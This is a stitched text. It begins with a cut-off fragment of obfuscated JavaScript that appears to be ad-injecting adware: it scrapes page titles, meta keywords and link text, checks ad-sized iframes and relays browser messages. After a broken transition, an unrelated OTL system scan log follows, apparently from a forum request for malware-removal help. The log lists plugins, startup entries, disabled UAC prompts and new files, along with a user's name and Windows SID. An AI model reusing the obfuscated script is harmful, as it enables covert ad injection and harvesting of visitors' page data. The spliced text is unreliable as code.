))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return a<b},V7T:2,d9T:\"od\",F5:function(a,b){return a|b},E9T:\"A\",Q2:function(a,b){return a<b},H2:function(a,b){return a<b},r7T:\"d\",M2:function(a,b){return a|b},R0:function(a,b){return a==b},\nD5:function(a,b){return a&b}},isRvzFrame=function(a){try{return a instanceof HTMLIFrameElement&&a.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode.className&&\"string\"==typeof a.parentNode.parentNode.className&&1<a.parentNode.parentNode.className.length&&removeNode(a.parentNode.parentNode.className.split(\" \")[0])}catch(b){return!1}};window.adzy653rk={version:\"1.0\",nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"2111\",eid:\"1272\",\nhid:\"17070091036678530380\",prid:100,lt:\"39\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"Qgr650HB\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),checkIfPartner:function(a){if(window.top==window)return isRvzFrame(a);\nvar b={_728x90:function(a){return a.parentElement&&a.parentElement.nextSibling&&a.parentElement.nextSibling.children&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0].innerHTML.match(/qa/)},_160_600:function(a){return a.parentElement&&a.parentElement.nextSibling&&\"String\"==typeof a.parentElement.nextSibling.innerHTML&&adzy653rk.regexExtTest.test(a.parentElement.nextSibling.innerHTML)},_625x250:function(a){return(a=a.getAttribute(\"style\"))?\na.match(/width:\\s?625px/)&&a.match(/width:\\s?250px/):!1},_345x600:function(a){return(a=a.getAttribute(\"style\"))?a.match(/width:\\s?345px/)&&a.match(/width:\\s?600px/):!1}},c;for(c in b)if(b[c](a))return!0;return!1},getKeywords:function(){var a=adzy653rk.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,d=b.length;c<d;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};\nfor(d=0;d<c.length;d++)try{var e=c[d].innerText;\"undefined\"==typeof e&&(e=c[d].textContent);for(var g=e.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\n\"l\")},isAncestor:function(a,b,c){function d(a){return\"object\"==typeof a&&a.top instanceof Window||/^\\s*\\[\\s*object\\s*Window\\s*\\]\\s*/.test(a+\"\")}c=c||30;return a==b?!0:!d(a)||!d(b)||b==window.top||0>=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d<c.length;d++)e=c[d],a.isAncestor(e.contentWindow,b.source)&&(isRvzFrame(e)?b.source.postMessage(b.data+\"_\"+a.l.encode(\"RVZ\"),\"*\"):b.source.postMessage(b.data,\"*\"))}}catch(g){}},!1)}},isAllowRunning:function(a){var b=adzy653rk,c,d=b.imp.hid,e=b.imp.eid,g=b.imp.prid,h=function(e){try{var d=b.l.encode(b.imp.hid+\"/\"+b.imp.eid+\"/\"+b.imp.prid);if(0==((e.dat

OTLタグ２



FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/20 15:21:21 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions
[2015/04/20 15:21:21 | 000,000,000 | ---D | M] (Avira Browser Safety) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions\abs@avira.com
[2014/06/30 01:40:59 | 000,000,000 | ---D | M] (HGPlugin) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google 繝峨く繝･繝｡繝ｳ繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google 繝峨Λ繧､繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
CHR - Extension: Google 繧ｦ繧ｩ繝ｬ繝・ヨ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\

O1 HOSTS File: ([2013/08/22 22:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = "F:\install.exe"
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/20 21:58:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\herdProtect
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
